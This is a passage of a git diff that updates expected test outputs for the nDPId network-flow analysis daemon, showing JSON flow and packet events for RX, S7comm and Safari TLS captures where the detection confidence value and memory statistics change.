+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","packets-captured":132,"packets-processed":132,"total-skipped-flows":0,"total-l4-payload-len":20931,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1460647320158} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 132/132 @@ -39,9 +39,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877511 bytes -~~ total memory freed........: 5877511 bytes -~~ total allocations/frees...: 118262/118262 +~~ total memory allocated....: 6011145 bytes +~~ total memory freed........: 6011145 bytes +~~ total allocations/frees...: 121024/121024 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 1899 chars diff --git a/test/results/s7comm.pcap.out b/test/results/s7comm.pcap.out index dc12ca3cb..dbd0940bb 100644 --- a/test/results/s7comm.pcap.out +++ b/test/results/s7comm.pcap.out @@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1408528803880} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":55,"packets-processed":55,"total-skipped-flows":0,"total-l4-payload-len":2290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1408528804016} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 55/55 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871038 bytes -~~ total memory freed........: 5871038 bytes -~~ total allocations/frees...: 118169/118169 +~~ total memory allocated....: 6004672 bytes +~~ total memory freed........: 6004672 bytes +~~ total allocations/frees...: 120931/120931 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 685 chars diff --git a/test/results/safari.pcap.out b/test/results/safari.pcap.out index e8d57ef4d..dfa752d05 100644 --- a/test/results/safari.pcap.out +++ b/test/results/safari.pcap.out @@ -4,9 +4,9 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -25,32 +25,32 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 